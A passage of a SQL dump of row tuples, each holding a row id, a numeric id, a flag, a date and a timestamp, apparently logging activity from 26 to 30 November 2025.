22:40:06'),(96498,4888,1,'2025-11-26','2025-11-26 22:40:08'),(96499,1606,1,'2025-11-26','2025-11-26 22:40:10'),(96500,3004,1,'2025-11-26','2025-11-26 22:41:05'),(96501,4963,1,'2025-11-26','2025-11-26 22:42:13'),(96502,4963,1,'2025-11-26','2025-11-26 22:43:17'),(96503,5406,1,'2025-11-26','2025-11-26 23:02:37'),(96504,5428,1,'2025-11-26','2025-11-26 23:09:07'),(96505,3038,1,'2025-11-26','2025-11-26 23:10:10'),(96506,5428,1,'2025-11-26','2025-11-26 23:12:12'),(96507,5125,1,'2025-11-26','2025-11-26 23:12:20'),(96508,5428,1,'2025-11-26','2025-11-26 23:12:22'),(96509,5125,1,'2025-11-26','2025-11-26 23:13:51'),(96510,2165,1,'2025-11-26','2025-11-26 23:18:48'),(96511,5428,1,'2025-11-26','2025-11-26 23:19:35'),(96512,5428,1,'2025-11-26','2025-11-26 23:20:27'),(96513,5428,1,'2025-11-26','2025-11-26 23:21:53'),(96514,5253,1,'2025-11-26','2025-11-26 23:24:11'),(96515,2161,1,'2025-11-26','2025-11-26 23:25:15'),(96516,3777,1,'2025-11-26','2025-11-26 23:26:17'),(96517,89,1,'2025-11-26','2025-11-26 23:27:24'),(96518,5567,1,'2025-11-26','2025-11-26 23:28:22'),(96519,1604,1,'2025-11-26','2025-11-26 23:28:46'),(96520,5425,1,'2025-11-26','2025-11-26 23:29:27'),(96521,5253,1,'2025-11-26','2025-11-26 23:29:28'),(96522,5626,1,'2025-11-26','2025-11-26 23:32:39'),(96523,4977,1,'2025-11-26','2025-11-26 23:47:17'),(96524,5436,1,'2025-11-26','2025-11-26 23:56:41'),(96525,72,1,'2025-11-26','2025-11-26 23:58:48'),(96526,5461,1,'2025-11-27','2025-11-27 00:14:37'),(96527,5153,1,'2025-11-27','2025-11-27 00:18:50'),(96528,4400,1,'2025-11-27','2025-11-27 00:22:14'),(96529,4323,1,'2025-11-27','2025-11-27 00:25:23'),(96530,4412,1,'2025-11-27','2025-11-27 00:26:22'),(96531,3229,1,'2025-11-27','2025-11-27 00:27:24'),(96532,110,1,'2025-11-27','2025-11-27 00:56:32'),(96533,5464,1,'2025-11-27','2025-11-27 00:58:37'),(96534,4712,1,'2025-11-27','2025-11-27 01:00:41'),(96535,4996,1,'2025-11-27','2025-11-27 01:11:16'),(96536,3038,1,'2025-11-27','2025-11-27 01:21:31'),(96537,5271,1,'2025-11-27','2025-11-27 01:25:38'),(96538,2658,1,'2025-11-27','2025-11-27 01:26:36'),(96539,4878,1,'2025-11-27','2025-11-27 01:26:36'),(96540,2989,1,'2025-11-27','2025-11-27 01:26:39'),(96541,5526,1,'2025-11-27','2025-11-27 01:27:42'),(96542,4878,1,'2025-11-27','2025-11-27 01:28:40'),(96543,5310,1,'2025-11-27','2025-11-27 01:31:42'),(96544,5131,1,'2025-11-27','2025-11-27 01:33:46'),(96545,4520,1,'2025-11-27','2025-11-27 02:26:19'),(96546,5137,1,'2025-11-27','2025-11-27 02:31:20'),(96547,2813,1,'2025-11-27','2025-11-27 02:31:27'),(96548,5614,1,'2025-11-27','2025-11-27 02:31:28'),(96549,4332,1,'2025-11-27','2025-11-27 02:33:25'),(96550,4753,1,'2025-11-27','2025-11-27 02:33:26'),(96551,3781,1,'2025-11-27','2025-11-27 02:34:27'),(96552,2296,1,'2025-11-27','2025-11-27 02:34:28'),(96553,1707,1,'2025-11-27','2025-11-27 02:34:29'),(96554,5116,1,'2025-11-27','2025-11-27 02:34:32'),(96555,110,1,'2025-11-27','2025-11-27 02:34:34'),(96556,4700,1,'2025-11-27','2025-11-27 02:36:25'),(96557,2063,1,'2025-11-27','2025-11-27 03:06:04'),(96558,1713,1,'2025-11-27','2025-11-27 03:08:17'),(96559,3313,1,'2025-11-27','2025-11-27 03:08:18'),(96560,4827,1,'2025-11-27','2025-11-27 03:23:41'),(96561,1544,1,'2025-11-27','2025-11-27 04:25:32'),(96562,3727,1,'2025-11-27','2025-11-27 04:36:58'),(96563,5163,1,'2025-11-27','2025-11-27 04:49:15'),(96564,469,1,'2025-11-27','2025-11-27 05:23:32'),(96565,3791,1,'2025-11-27','2025-11-27 06:08:20'),(96566,5636,1,'2025-11-27','2025-11-27 06:43:42'),(96567,3087,1,'2025-11-27','2025-11-27 07:26:12'),(96568,5515,1,'2025-11-27','2025-11-27 07:29:22'),(96569,1715,1,'2025-11-27','2025-11-27 08:29:24'),(96570,4712,1,'2025-11-27','2025-11-27 08:32:37'),(96571,4893,1,'2025-11-27','2025-11-27 08:32:37'),(96572,4719,1,'2025-11-27','2025-11-27 08:33:13'),(96573,4893,1,'2025-11-27','2025-11-27 08:33:43'),(96574,5449,1,'2025-11-27','2025-11-27 09:13:09'),(96575,4870,1,'2025-11-27','2025-11-27 09:13:09'),(96576,4870,1,'2025-11-27','2025-11-27 09:14:11'),(96577,91,1,'2025-11-27','2025-11-27 09:27:32'),(96578,5631,1,'2025-11-27','2025-11-27 10:26:13'),(96579,4738,1,'2025-11-27','2025-11-27 10:28:38'),(96580,483,1,'2025-11-27','2025-11-27 10:29:53'),(96581,1699,1,'2025-11-27','2025-11-27 10:31:02'),(96582,5598,1,'2025-11-27','2025-11-27 10:32:19'),(96583,1594,1,'2025-11-27','2025-11-27 10:49:00'),(96584,4971,1,'2025-11-27','2025-11-27 11:55:26'),(96585,68,1,'2025-11-27','2025-11-27 12:32:11'),(96586,84,1,'2025-11-27','2025-11-27 12:35:08'),(96587,1718,1,'2025-11-27','2025-11-27 12:35:34'),(96588,76,1,'2025-11-27','2025-11-27 12:35:52'),(96589,5457,1,'2025-11-27','2025-11-27 12:48:02'),(96590,3280,1,'2025-11-27','2025-11-27 13:12:51'),(96591,4980,1,'2025-11-27','2025-11-27 13:13:55'),(96592,5512,1,'2025-11-27','2025-11-27 13:26:55'),(96593,2248,1,'2025-11-27','2025-11-27 13:31:24'),(96594,476,1,'2025-11-27','2025-11-27 13:37:51'),(96595,1582,1,'2025-11-27','2025-11-27 14:29:23'),(96596,1582,1,'2025-11-27','2025-11-27 14:33:38'),(96597,5461,1,'2025-11-27','2025-11-27 14:51:50'),(96598,3307,1,'2025-11-27','2025-11-27 18:01:34'),(96599,3781,1,'2025-11-27','2025-11-27 18:37:43'),(96600,4950,1,'2025-11-27','2025-11-27 19:06:25'),(96601,5515,1,'2025-11-27','2025-11-27 19:13:53'),(96602,5433,1,'2025-11-27','2025-11-27 19:27:26'),(96603,3752,1,'2025-11-27','2025-11-27 19:36:49'),(96604,4663,1,'2025-11-27','2025-11-27 21:01:07'),(96605,5421,1,'2025-11-27','2025-11-27 21:02:10'),(96606,3104,1,'2025-11-27','2025-11-27 21:02:10'),(96607,5421,1,'2025-11-27','2025-11-27 21:03:17'),(96608,3053,1,'2025-11-27','2025-11-27 21:25:28'),(96609,5512,1,'2025-11-27','2025-11-27 22:06:36'),(96610,1582,1,'2025-11-27','2025-11-27 22:14:20'),(96611,4930,1,'2025-11-27','2025-11-27 22:15:44'),(96612,4561,1,'2025-11-27','2025-11-27 22:30:23'),(96613,4561,1,'2025-11-27','2025-11-27 22:32:37'),(96614,3694,1,'2025-11-27','2025-11-27 23:01:07'),(96615,484,1,'2025-11-27','2025-11-27 23:03:25'),(96616,2159,1,'2025-11-27','2025-11-27 23:05:46'),(96617,4238,1,'2025-11-27','2025-11-27 23:09:20'),(96618,3774,1,'2025-11-27','2025-11-27 23:11:42'),(96619,1544,1,'2025-11-27','2025-11-27 23:11:43'),(96620,4660,1,'2025-11-27','2025-11-27 23:21:05'),(96621,3486,1,'2025-11-27','2025-11-27 23:34:09'),(96622,1718,1,'2025-11-27','2025-11-27 23:44:29'),(96623,4391,1,'2025-11-28','2025-11-28 00:07:17'),(96624,5307,1,'2025-11-28','2025-11-28 00:32:27'),(96625,1722,1,'2025-11-28','2025-11-28 00:56:18'),(96626,4341,1,'2025-11-28','2025-11-28 01:07:29'),(96627,5454,1,'2025-11-28','2025-11-28 01:10:50'),(96628,3034,1,'2025-11-28','2025-11-28 01:32:12'),(96629,87,1,'2025-11-28','2025-11-28 01:50:36'),(96630,2156,1,'2025-11-28','2025-11-28 02:46:06'),(96631,5128,1,'2025-11-28','2025-11-28 03:13:50'),(96632,5128,1,'2025-11-28','2025-11-28 03:17:07'),(96633,478,1,'2025-11-28','2025-11-28 03:23:51'),(96634,1701,1,'2025-11-28','2025-11-28 03:31:53'),(96635,3056,1,'2025-11-28','2025-11-28 03:38:02'),(96636,2809,1,'2025-11-28','2025-11-28 03:44:29'),(96637,4960,1,'2025-11-28','2025-11-28 03:47:15'),(96638,3710,1,'2025-11-28','2025-11-28 03:50:09'),(96639,5037,1,'2025-11-28','2025-11-28 03:52:28'),(96640,3060,1,'2025-11-28','2025-11-28 03:52:29'),(96641,4618,1,'2025-11-28','2025-11-28 03:59:22'),(96642,5400,1,'2025-11-28','2025-11-28 04:15:04'),(96643,5578,1,'2025-11-28','2025-11-28 04:34:10'),(96644,80,1,'2025-11-28','2025-11-28 04:38:58'),(96645,3781,1,'2025-11-28','2025-11-28 05:06:43'),(96646,5441,1,'2025-11-28','2025-11-28 05:10:09'),(96647,4400,1,'2025-11-28','2025-11-28 05:44:29'),(96648,5374,1,'2025-11-28','2025-11-28 05:47:14'),(96649,4618,1,'2025-11-28','2025-11-28 05:50:17'),(96650,1732,1,'2025-11-28','2025-11-28 05:58:18'),(96651,3531,1,'2025-11-28','2025-11-28 06:24:07'),(96652,4960,1,'2025-11-28','2025-11-28 07:01:01'),(96653,4960,1,'2025-11-28','2025-11-28 07:02:09'),(96654,3752,1,'2025-11-28','2025-11-28 07:02:09'),(96655,468,1,'2025-11-28','2025-11-28 07:34:00'),(96656,5489,1,'2025-11-28','2025-11-28 07:46:25'),(96657,5421,1,'2025-11-28','2025-11-28 09:24:21'),(96658,91,1,'2025-11-28','2025-11-28 09:33:34'),(96659,91,1,'2025-11-28','2025-11-28 09:35:56'),(96660,3438,1,'2025-11-28','2025-11-28 09:38:51'),(96661,5406,1,'2025-11-28','2025-11-28 09:42:04'),(96662,1614,1,'2025-11-28','2025-11-28 10:33:16'),(96663,4275,1,'2025-11-28','2025-11-28 10:36:42'),(96664,469,1,'2025-11-28','2025-11-28 10:45:21'),(96665,5323,1,'2025-11-28','2025-11-28 11:22:08'),(96666,3038,1,'2025-11-28','2025-11-28 11:22:09'),(96667,4420,1,'2025-11-28','2025-11-28 11:26:44'),(96668,4677,1,'2025-11-28','2025-11-28 11:28:58'),(96669,5409,1,'2025-11-28','2025-11-28 11:30:03'),(96670,87,1,'2025-11-28','2025-11-28 11:33:29'),(96671,5561,1,'2025-11-28','2025-11-28 11:34:36'),(96672,76,1,'2025-11-28','2025-11-28 11:57:04'),(96673,335,1,'2025-11-28','2025-11-28 11:59:37'),(96674,87,1,'2025-11-28','2025-11-28 12:00:42'),(96675,5292,1,'2025-11-28','2025-11-28 12:22:41'),(96676,4657,1,'2025-11-28','2025-11-28 12:26:07'),(96677,4930,1,'2025-11-28','2025-11-28 12:33:57'),(96678,3727,1,'2025-11-28','2025-11-28 12:33:57'),(96679,4930,1,'2025-11-28','2025-11-28 12:35:02'),(96680,5101,1,'2025-11-28','2025-11-28 12:37:16'),(96681,2751,1,'2025-11-28','2025-11-28 12:37:16'),(96682,1728,1,'2025-11-28','2025-11-28 12:45:44'),(96683,5567,1,'2025-11-28','2025-11-28 12:54:46'),(96684,1724,1,'2025-11-28','2025-11-28 13:32:08'),(96685,76,1,'2025-11-28','2025-11-28 13:39:48'),(96686,3781,1,'2025-11-28','2025-11-28 14:14:05'),(96687,4960,1,'2025-11-28','2025-11-28 14:16:23'),(96688,3489,1,'2025-11-28','2025-11-28 14:32:59'),(96689,4551,1,'2025-11-28','2025-11-28 14:33:01'),(96690,2152,1,'2025-11-28','2025-11-28 14:38:27'),(96691,4977,1,'2025-11-28','2025-11-28 14:54:33'),(96692,4960,1,'2025-11-28','2025-11-28 15:23:14'),(96693,5618,1,'2025-11-28','2025-11-28 15:27:12'),(96694,4960,1,'2025-11-28','2025-11-28 15:52:17'),(96695,5436,1,'2025-11-28','2025-11-28 16:29:31'),(96696,4591,1,'2025-11-28','2025-11-28 16:29:37'),(96697,4517,1,'2025-11-28','2025-11-28 16:30:41'),(96698,4591,1,'2025-11-28','2025-11-28 16:30:41'),(96699,5449,1,'2025-11-28','2025-11-28 16:31:48'),(96700,5420,1,'2025-11-28','2025-11-28 16:47:45'),(96701,5598,1,'2025-11-28','2025-11-28 17:25:57'),(96702,3175,1,'2025-11-28','2025-11-28 17:28:16'),(96703,5058,1,'2025-11-28','2025-11-28 17:29:21'),(96704,4642,1,'2025-11-28','2025-11-28 17:30:27'),(96705,5406,1,'2025-11-28','2025-11-28 17:30:55'),(96706,5058,1,'2025-11-28','2025-11-28 17:32:37'),(96707,5464,1,'2025-11-28','2025-11-28 17:34:50'),(96708,4642,1,'2025-11-28','2025-11-28 17:37:01'),(96709,5476,1,'2025-11-28','2025-11-28 17:53:23'),(96710,5502,1,'2025-11-28','2025-11-28 18:03:05'),(96711,2411,1,'2025-11-28','2025-11-28 18:07:38'),(96712,3083,1,'2025-11-28','2025-11-28 18:10:27'),(96713,1720,1,'2025-11-28','2025-11-28 18:20:54'),(96714,4741,1,'2025-11-28','2025-11-28 19:10:38'),(96715,4741,1,'2025-11-28','2025-11-28 19:10:49'),(96716,4428,1,'2025-11-28','2025-11-28 19:30:50'),(96717,5054,1,'2025-11-28','2025-11-28 19:36:31'),(96718,1586,1,'2025-11-28','2025-11-28 19:37:23'),(96719,5054,1,'2025-11-28','2025-11-28 19:37:36'),(96720,3005,1,'2025-11-28','2025-11-28 19:39:52'),(96721,5301,1,'2025-11-28','2025-11-28 19:40:59'),(96722,3066,1,'2025-11-28','2025-11-28 19:43:12'),(96723,3069,1,'2025-11-28','2025-11-28 19:52:03'),(96724,5397,1,'2025-11-28','2025-11-28 19:59:46'),(96725,5492,1,'2025-11-28','2025-11-28 20:03:04'),(96726,4983,1,'2025-11-28','2025-11-28 20:30:57'),(96727,5256,1,'2025-11-28','2025-11-28 20:30:58'),(96728,1697,1,'2025-11-28','2025-11-28 21:15:59'),(96729,5472,1,'2025-11-28','2025-11-28 21:28:46'),(96730,4744,1,'2025-11-28','2025-11-28 21:32:11'),(96731,4709,1,'2025-11-28','2025-11-28 21:32:11'),(96732,4396,1,'2025-11-28','2025-11-28 21:33:22'),(96733,4681,1,'2025-11-28','2025-11-28 21:37:45'),(96734,3731,1,'2025-11-28','2025-11-28 21:37:50'),(96735,87,1,'2025-11-28','2025-11-28 21:42:18'),(96736,84,1,'2025-11-28','2025-11-28 21:42:18'),(96737,5464,1,'2025-11-28','2025-11-28 21:54:22'),(96738,4712,1,'2025-11-28','2025-11-28 22:06:30'),(96739,5268,1,'2025-11-28','2025-11-28 22:07:42'),(96740,5268,1,'2025-11-28','2025-11-28 22:08:49'),(96741,1711,1,'2025-11-28','2025-11-28 22:23:37'),(96742,5457,1,'2025-11-28','2025-11-28 22:50:07'),(96743,1596,1,'2025-11-28','2025-11-28 23:03:08'),(96744,1770,1,'2025-11-28','2025-11-28 23:30:46'),(96745,5593,1,'2025-11-28','2025-11-28 23:44:11'),(96746,3498,1,'2025-11-28','2025-11-28 23:53:33'),(96747,5570,1,'2025-11-28','2025-11-28 23:57:15'),(96748,2813,1,'2025-11-29','2025-11-29 00:12:52'),(96749,3259,1,'2025-11-29','2025-11-29 00:29:05'),(96750,4835,1,'2025-11-29','2025-11-29 00:32:14'),(96751,1718,1,'2025-11-29','2025-11-29 00:32:26'),(96752,4627,1,'2025-11-29','2025-11-29 00:34:37'),(96753,4963,1,'2025-11-29','2025-11-29 00:42:22'),(96754,4874,1,'2025-11-29','2025-11-29 00:43:22'),(96755,4874,1,'2025-11-29','2025-11-29 00:47:42'),(96756,4930,1,'2025-11-29','2025-11-29 00:48:43'),(96757,4963,1,'2025-11-29','2025-11-29 00:50:09'),(96758,570,1,'2025-11-29','2025-11-29 01:08:39'),(96759,4691,1,'2025-11-29','2025-11-29 01:15:55'),(96760,4858,1,'2025-11-29','2025-11-29 01:22:34'),(96761,4858,1,'2025-11-29','2025-11-29 01:23:39'),(96762,3090,1,'2025-11-29','2025-11-29 01:26:59'),(96763,5400,1,'2025-11-29','2025-11-29 01:30:12'),(96764,4335,1,'2025-11-29','2025-11-29 01:30:14'),(96765,5122,1,'2025-11-29','2025-11-29 01:31:21'),(96766,4529,1,'2025-11-29','2025-11-29 01:37:48'),(96767,5163,1,'2025-11-29','2025-11-29 01:42:35'),(96768,3282,1,'2025-11-29','2025-11-29 01:43:22'),(96769,485,1,'2025-11-29','2025-11-29 02:01:07'),(96770,5425,1,'2025-11-29','2025-11-29 02:04:43'),(96771,3045,1,'2025-11-29','2025-11-29 02:17:05'),(96772,5363,1,'2025-11-29','2025-11-29 02:32:13'),(96773,3053,1,'2025-11-29','2025-11-29 02:34:05'),(96774,3282,1,'2025-11-29','2025-11-29 02:47:56'),(96775,1703,1,'2025-11-29','2025-11-29 03:13:22'),(96776,1730,1,'2025-11-29','2025-11-29 03:13:35'),(96777,4373,1,'2025-11-29','2025-11-29 03:21:58'),(96778,5412,1,'2025-11-29','2025-11-29 03:25:20'),(96779,5122,1,'2025-11-29','2025-11-29 03:25:20'),(96780,108,1,'2025-11-29','2025-11-29 03:27:32'),(96781,1610,1,'2025-11-29','2025-11-29 03:34:03'),(96782,467,1,'2025-11-29','2025-11-29 03:46:01'),(96783,3781,1,'2025-11-29','2025-11-29 04:12:16'),(96784,5122,1,'2025-11-29','2025-11-29 04:29:59'),(96785,4722,1,'2025-11-29','2025-11-29 04:43:30'),(96786,5412,1,'2025-11-29','2025-11-29 04:51:25'),(96787,5028,1,'2025-11-29','2025-11-29 05:32:01'),(96788,5028,1,'2025-11-29','2025-11-29 05:33:09'),(96789,2609,1,'2025-11-29','2025-11-29 05:54:43'),(96790,4582,1,'2025-11-29','2025-11-29 06:13:02'),(96791,3117,1,'2025-11-29','2025-11-29 06:14:50'),(96792,4648,1,'2025-11-29','2025-11-29 06:14:52'),(96793,106,1,'2025-11-29','2025-11-29 06:19:19'),(96794,4779,1,'2025-11-29','2025-11-29 06:36:30'),(96795,2904,1,'2025-11-29','2025-11-29 06:44:31'),(96796,5428,1,'2025-11-29','2025-11-29 07:15:07'),(96797,5441,1,'2025-11-29','2025-11-29 07:47:10'),(96798,5125,1,'2025-11-29','2025-11-29 07:50:26'),(96799,5378,1,'2025-11-29','2025-11-29 08:27:56'),(96800,5378,1,'2025-11-29','2025-11-29 08:29:00'),(96801,5317,1,'2025-11-29','2025-11-29 08:31:10'),(96802,2804,1,'2025-11-29','2025-11-29 08:32:20'),(96803,5307,1,'2025-11-29','2025-11-29 08:42:15'),(96804,5054,1,'2025-11-29','2025-11-29 08:48:59'),(96805,4712,1,'2025-11-29','2025-11-29 09:16:21'),(96806,3045,1,'2025-11-29','2025-11-29 09:23:00'),(96807,3045,1,'2025-11-29','2025-11-29 09:26:15'),(96808,1588,1,'2025-11-29','2025-11-29 09:28:37'),(96809,4496,1,'2025-11-29','2025-11-29 09:31:58'),(96810,91,1,'2025-11-29','2025-11-29 09:36:09'),(96811,5314,1,'2025-11-29','2025-11-29 09:36:25'),(96812,5585,1,'2025-11-29','2025-11-29 09:48:11'),(96813,89,1,'2025-11-29','2025-11-29 10:06:02'),(96814,1741,1,'2025-11-29','2025-11-29 10:32:38'),(96815,3781,1,'2025-11-29','2025-11-29 10:54:27'),(96816,4396,1,'2025-11-29','2025-11-29 11:06:22'),(96817,4963,1,'2025-11-29','2025-11-29 11:13:10'),(96818,4977,1,'2025-11-29','2025-11-29 11:19:19'),(96819,5062,1,'2025-11-29','2025-11-29 11:27:58'),(96820,4883,1,'2025-11-29','2025-11-29 11:31:21'),(96821,5062,1,'2025-11-29','2025-11-29 11:31:23'),(96822,4883,1,'2025-11-29','2025-11-29 11:34:53'),(96823,87,1,'2025-11-29','2025-11-29 11:42:15'),(96824,3788,1,'2025-11-29','2025-11-29 11:52:32'),(96825,488,1,'2025-11-29','2025-11-29 12:14:55'),(96826,4514,1,'2025-11-29','2025-11-29 12:24:25'),(96827,72,1,'2025-11-29','2025-11-29 12:48:57'),(96828,3097,1,'2025-11-29','2025-11-29 12:57:34'),(96829,68,1,'2025-11-29','2025-11-29 13:16:45'),(96830,3004,1,'2025-11-29','2025-11-29 13:19:27'),(96831,5076,1,'2025-11-29','2025-11-29 13:28:57'),(96832,2154,1,'2025-11-29','2025-11-29 13:33:25'),(96833,3781,1,'2025-11-29','2025-11-29 13:33:35'),(96834,3229,1,'2025-11-29','2025-11-29 13:38:57'),(96835,1730,1,'2025-11-29','2025-11-29 13:59:24'),(96836,5400,1,'2025-11-29','2025-11-29 14:11:34'),(96837,4651,1,'2025-11-29','2025-11-29 14:17:17'),(96838,5567,1,'2025-11-29','2025-11-29 14:20:47'),(96839,1728,1,'2025-11-29','2025-11-29 14:22:59'),(96840,4980,1,'2025-11-29','2025-11-29 14:27:21'),(96841,5420,1,'2025-11-29','2025-11-29 14:35:30'),(96842,76,1,'2025-11-29','2025-11-29 14:42:06'),(96843,5295,1,'2025-11-29','2025-11-29 14:42:22'),(96844,5076,1,'2025-11-29','2025-11-29 14:43:09'),(96845,4983,1,'2025-11-29','2025-11-29 14:50:28'),(96846,5593,1,'2025-11-29','2025-11-29 15:20:09'),(96847,5310,1,'2025-11-29','2025-11-29 15:33:21'),(96848,4741,1,'2025-11-29','2025-11-29 15:44:29'),(96849,5461,1,'2025-11-29','2025-11-29 15:48:40'),(96850,3486,1,'2025-11-29','2025-11-29 15:53:03'),(96851,5415,1,'2025-11-29','2025-11-29 15:53:33'),(96852,5054,1,'2025-11-29','2025-11-29 16:10:20'),(96853,5428,1,'2025-11-29','2025-11-29 16:23:19'),(96854,4712,1,'2025-11-29','2025-11-29 16:24:15'),(96855,4950,1,'2025-11-29','2025-11-29 16:42:05'),(96856,5122,1,'2025-11-29','2025-11-29 17:05:25'),(96857,110,1,'2025-11-29','2025-11-29 17:15:54'),(96858,485,1,'2025-11-29','2025-11-29 17:19:09'),(96859,3058,1,'2025-11-29','2025-11-29 17:32:34'),(96860,2704,1,'2025-11-29','2025-11-29 17:34:55'),(96861,5605,1,'2025-11-29','2025-11-29 17:49:29'),(96862,2956,1,'2025-11-29','2025-11-29 18:01:13'),(96863,5502,1,'2025-11-29','2025-11-29 18:10:48'),(96864,4677,1,'2025-11-29','2025-11-29 18:10:49'),(96865,5134,1,'2025-11-29','2025-11-29 18:22:09'),(96866,2769,1,'2025-11-29','2025-11-29 18:23:18'),(96867,5499,1,'2025-11-29','2025-11-29 18:29:44'),(96868,4729,1,'2025-11-29','2025-11-29 18:29:56'),(96869,3097,1,'2025-11-29','2025-11-29 18:48:21'),(96870,3027,1,'2025-11-29','2025-11-29 18:58:49'),(96871,3053,1,'2025-11-29','2025-11-29 19:07:18'),(96872,5464,1,'2025-11-29','2025-11-29 19:16:49'),(96873,3781,1,'2025-11-29','2025-11-29 19:18:54'),(96874,1749,1,'2025-11-29','2025-11-29 19:21:13'),(96875,4457,1,'2025-11-29','2025-11-29 19:22:20'),(96876,3109,1,'2025-11-29','2025-11-29 19:40:30'),(96877,4348,1,'2025-11-29','2025-11-29 19:54:55'),(96878,4582,1,'2025-11-29','2025-11-29 20:09:04'),(96879,5636,1,'2025-11-29','2025-11-29 20:19:44'),(96880,5320,1,'2025-11-29','2025-11-29 20:22:23'),(96881,3788,1,'2025-11-29','2025-11-29 20:23:20'),(96882,5320,1,'2025-11-29','2025-11-29 20:23:32'),(96883,5433,1,'2025-11-29','2025-11-29 20:27:59'),(96884,1697,1,'2025-11-29','2025-11-29 20:37:44'),(96885,5042,1,'2025-11-29','2025-11-29 20:40:28'),(96886,5042,1,'2025-11-29','2025-11-29 20:42:41'),(96887,3045,1,'2025-11-29','2025-11-29 20:51:48'),(96888,488,1,'2025-11-29','2025-11-29 21:06:07'),(96889,91,1,'2025-11-29','2025-11-29 21:18:41'),(96890,3030,1,'2025-11-29','2025-11-29 21:18:43'),(96891,3030,1,'2025-11-29','2025-11-29 21:19:12'),(96892,4335,1,'2025-11-29','2025-11-29 21:20:22'),(96893,5037,1,'2025-11-29','2025-11-29 21:32:19'),(96894,5037,1,'2025-11-29','2025-11-29 21:32:50'),(96895,5406,1,'2025-11-29','2025-11-29 21:36:22'),(96896,5076,1,'2025-11-29','2025-11-29 21:51:09'),(96897,5512,1,'2025-11-29','2025-11-29 21:59:26'),(96898,5457,1,'2025-11-29','2025-11-29 21:59:26'),(96899,5457,1,'2025-11-29','2025-11-29 21:59:59'),(96900,5512,1,'2025-11-29','2025-11-29 22:00:00'),(96901,5512,1,'2025-11-29','2025-11-29 22:00:27'),(96902,5636,1,'2025-11-29','2025-11-29 22:07:20'),(96903,4835,1,'2025-11-29','2025-11-29 22:07:41'),(96904,4996,1,'2025-11-29','2025-11-29 22:24:16'),(96905,4660,1,'2025-11-29','2025-11-29 22:25:31'),(96906,5598,1,'2025-11-29','2025-11-29 22:29:02'),(96907,5598,1,'2025-11-29','2025-11-29 22:29:35'),(96908,5598,1,'2025-11-29','2025-11-29 22:30:02'),(96909,4660,1,'2025-11-29','2025-11-29 22:45:32'),(96910,3781,1,'2025-11-29','2025-11-29 22:49:47'),(96911,3691,1,'2025-11-29','2025-11-29 22:51:25'),(96912,5406,1,'2025-11-29','2025-11-29 22:57:33'),(96913,4677,1,'2025-11-29','2025-11-29 23:13:54'),(96914,472,1,'2025-11-29','2025-11-29 23:19:08'),(96915,5428,1,'2025-11-29','2025-11-29 23:19:17'),(96916,4971,1,'2025-11-29','2025-11-29 23:25:20'),(96917,3107,1,'2025-11-29','2025-11-29 23:25:29'),(96918,3058,1,'2025-11-29','2025-11-29 23:50:14'),(96919,5400,1,'2025-11-29','2025-11-29 23:57:11'),(96920,5400,1,'2025-11-29','2025-11-29 23:57:40'),(96921,4529,1,'2025-11-30','2025-11-30 00:01:49'),(96922,5425,1,'2025-11-30','2025-11-30 00:20:43'),(96923,5425,1,'2025-11-30','2025-11-30 00:21:46'),(96924,1747,1,'2025-11-30','2025-11-30 00:23:24'),(96925,1747,1,'2025-11-30','2025-11-30 00:23:54'),(96926,570,1,'2025-11-30','2025-11-30 00:49:22'),(96927,84,1,'2025-11-30','2025-11-30 01:39:38'),(96928,2804,1,'2025-11-30','2025-11-30 01:40:23'),(96929,5412,1,'2025-11-30','2025-11-30 01:44:13'),(96930,5412,1,'2025-11-30','2025-11-30 01:44:41'),(96931,5163,1,'2025-11-30','2025-11-30 01:48:46'),(96932,5406,1,'2025-11-30','2025-11-30 02:05:38'),(96933,3027,1,'2025-11-30','2025-11-30 02:08:20'),(96934,3117,1,'2025-11-30','2025-11-30 02:11:23'),(96935,3117,1,'2025-11-30','2025-11-30 02:12:04'),(96936,3117,1,'2025-11-30','2025-11-30 02:12:28'),(96937,3117,1,'2025-11-30','2025-11-30 02:14:45'),(96938,4950,1,'2025-11-30','2025-11-30 02:15:49'),(96939,5585,1,'2025-11-30','2025-11-30 02:17:50'),(96940,4622,1,'2025-11-30','2025-11-30 02:23:40'),(96941,2904,1,'2025-11-30','2025-11-30 02:23:44'),(96942,4622,1,'2025-11-30','2025-11-30 02:24:06'),(96943,4622,1,'2025-11-30','2025-11-30 02:24:36'),(96944,4396,1,'2025-11-30','2025-11-30 02:27:58'),(96945,5259,1,'2025-11-30','2025-11-30 02:30:56'),(96946,5259,1,'2025-11-30','2025-11-30 02:31:29'),(96947,5259,1,'2025-11-30','2025-11-30 02:31:54'),(96948,5428,1,'2025-11-30','2025-11-30 02:36:52'),(96949,5428,1,'2025-11-30','2025-11-30 02:37:22'),(96950,3038,1,'2025-11-30','2025-11-30 02:40:45'),(96951,3038,1,'2025-11-30','2025-11-30 02:41:16'),(96952,3038,1,'2025-11-30','2025-11-30 02:41:48'),(96953,3038,1,'2025-11-30','2025-11-30 02:43:40'),(96954,3498,1,'2025-11-30','2025-11-30 02:52:44'),(96955,2813,1,'2025-11-30','2025-11-30 03:07:27'),(96956,5146,1,'2025-11-30','2025-11-30 03:18:19'),(96957,3045,1,'2025-11-30','2025-11-30 03:19:19'),(96958,3045,1,'2025-11-30','2025-11-30 03:20:21'),(96959,3045,1,'2025-11-30','2025-11-30 03:21:23'),(96960,2704,1,'2025-11-30','2025-11-30 03:28:29'),(96961,5512,1,'2025-11-30','2025-11-30 03:36:18'),(96962,5037,1,'2025-11-30','2025-11-30 03:36:25'),(96963,5457,1,'2025-11-30','2025-11-30 03:36:27'),(96964,5428,1,'2025-11-30','2025-11-30 03:36:32'),(96965,5428,1,'2025-11-30','2025-11-30 03:36:40'),(96966,5259,1,'2025-11-30','2025-11-30 03:36:46'),(96967,3104,1,'2025-11-30','2025-11-30 03:51:50'),(96968,1720,1,'2025-11-30','2025-11-30 04:15:32'),(96969,5499,1,'2025-11-30','2025-11-30 04:38:13'),(96970,3004,1,'2025-11-30','2025-11-30 04:48:07'),(96971,5346,1,'2025-11-30','2025-11-30 05:18:12'),(96972,1596,1,'2025-11-30','2025-11-30 06:00:22'),(96973,1582,1,'2025-11-30','2025-11-30 06:08:15'),(96974,5461,1,'2025-11-30','2025-11-30 06:52:31'),(96975,3102,1,'2025-11-30','2025-11-30 06:58:22'),(96976,1608,1,'2025-11-30','2025-11-30 08:44:05'),(96977,87,1,'2025-11-30','2025-11-30 08:57:23'),(96978,91,1,'2025-11-30','2025-11-30 08:58:30'),(96979,472,1,'2025-11-30','2025-11-30 09:23:31'),(96980,4335,1,'2025-11-30','2025-11-30 09:29:09'),(96981,5464,1,'2025-11-30','2025-11-30 09:32:30'),(96982,5495,1,'2025-11-30','2025-11-30 